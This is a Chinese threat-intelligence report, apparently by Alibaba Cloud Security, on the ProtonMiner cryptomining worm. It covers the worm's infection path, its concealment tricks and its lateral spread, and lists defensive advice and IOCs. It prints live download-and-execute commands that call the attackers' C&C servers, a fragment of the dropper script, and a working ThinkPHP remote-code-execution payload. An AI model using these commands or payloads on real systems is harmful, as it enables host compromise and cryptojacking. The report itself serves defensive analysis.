??背景

近日，阿里云安全監測到一種挖礦蠕蟲，正在互聯網上加速傳播。阿里云安全根據它使用ProtonMail郵箱地址作為礦池用戶名的行為，將其命名為ProtonMiner。據分析，這種蠕蟲與TrendMicro于2018年12月曾報導過的“利用ElasticSearch舊漏洞傳播的蠕蟲”非常相似，可能是同一團伙所為。但與先前報導不同的是，二月中旬，該挖礦蠕蟲擴大了攻擊面，從僅攻擊ElasticSearch這一種服務，變為攻擊包括Redis, Weblogic在內的多種服務，傳播速度大大加快。

本文著重描寫該挖礦僵尸網絡的傳播手法，并在文末列出了安全建議，以幫助用戶避免遭受感染，或在已被感染的情況下進行清理。

感染路徑

攻擊者先控制被感染主機執行以下兩條命令之一，從而下載并運行uuu.sh。

/bin/bash -c curl -fsSL http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh/bin/bash -c curl -fsSL http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh

而uuu.sh腳本運行后，將繼續下載挖礦程序和配置文件用于挖礦，以及下載蠕蟲木馬用于繼續攻擊未感染主機。

“謹慎”的入侵腳本

入侵腳本uuu.sh，首先會通過試著寫入"/etc/devtools"目錄，來判斷當前賬戶是否擁有root權限；腳本的大部分功能，只有當前賬號具有root權限時才會運行。

#!/bin/shecho 1 > /etc/devtoolsif [ -f "$rtdir" ]thenecho "i am root"echo "goto 1" >> /etc/devtools# download & attackfi

該腳本具有典型挖礦事件中惡意腳本的特征：檢查并殺死其他僵尸網絡的進程、將自身寫入系統crontab文件、修改iptables設置從而允許某些端口上的通信等。然而這一腳本的作者或許更加謹慎：

1.在腳本最后，攻擊者清空了命令歷史記錄

2.在挖礦配置文件中，攻擊者使用了多個ProtonMail郵箱地址作為連接到礦池的用戶名。ProtonMail是世界最大的安全郵件服務提供商，ProtonMiner也是因此而得名。這種使用郵箱地址，而非門羅幣錢包地址作為礦池用戶名的做法很好地“保護”了攻擊者的隱私，也為安全工作者們判斷該僵尸網絡的規模和收益情況增加了難度。

傳播分析

ProtonMiner的橫向傳播程序名為"systemctI"，是一個由Go語言編譯的程序。它的main函數如下圖所示：

該程序在運行時，會首先通過_tmp_exe_linx_ipc_Init_ip等方法對要掃描的ip和使用的弱密碼進行初始化。過程中會請求并下載以下兩個地址的文件。

https://pixeldra.in/api/download/I9RRye (ip地址c段列表)
https://pixeldra.in/api/download/-7A5aP (弱密碼列表)

之后程序會進入main_Scan函數，該函數包含大量的掃描和漏洞利用相關子函數。

下表列出了受到該挖礦僵尸網絡影響的服務和漏洞：

例如一個ThinkPHP 的payload：

POST /index.php?s=captcha HTTP/1.1%0d%0aHost: ...%0d%0aUser-Agent: Go-http-client/1.1%0d%0aContent-Length:132%0d%0aConnection: close%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0aAccept-Encoding:gzip%0d%0a%0d%0a_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=url -fsSLhttp://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh

ProtonMiner僵尸網絡擴大攻擊面之后，傳播速度有了顯著的提升。從下圖可以看出，進入2月份以來，攻擊量快速上升，并在2月中旬達到高峰，阿里云觀察到已有上千臺主機受到感染：

安全建議

不要用root賬戶啟動數據庫、網站服務器等服務，因為root啟動的服務一旦被成功入侵，攻擊者將擁有被入侵主機的所有權限。此外，像Redis和Hadoop這些主要是內部使用的服務，不應暴露在公網上。

挖礦僵尸網絡更新速度非常快，它們部分導致了互聯網上無處不在的威脅。您可以使用云防火墻服務，檢測、攔截、并保護客戶避免感染。

如果你關注自身業務的網絡安全卻又雇不起一名安全工程師，那么你可以試試阿里云的安全管家產品，讓阿里云的安全專家來給你恰當的幫助，例如協助你清除已存在的病毒、木馬等。

IOC

C&C服務器:

45.76.122.92

207.148.70.143

惡意文件:

礦池地址：

xmr.pool.minergate.com:45700

使用的賬號（郵箱）名:

xjkhjjkasd@protonmail.com

dashcoin230cdd@protonmail.com

alksjewio@protonmail.com

23odi093dd@protonmail.com

olpeplckdd3@protonmail.com

參考
https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-spreads-via-old-vulnerabilities-on-elasticsearch/????

本文作者：悟泛

原文鏈接：https://yq.aliyun.com/articles/691361?utm_content=g_1000044237

總結

以上是生活随笔為你收集整理的威胁快报|ProtonMiner挖矿蠕虫扩大攻击面，加速传播的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。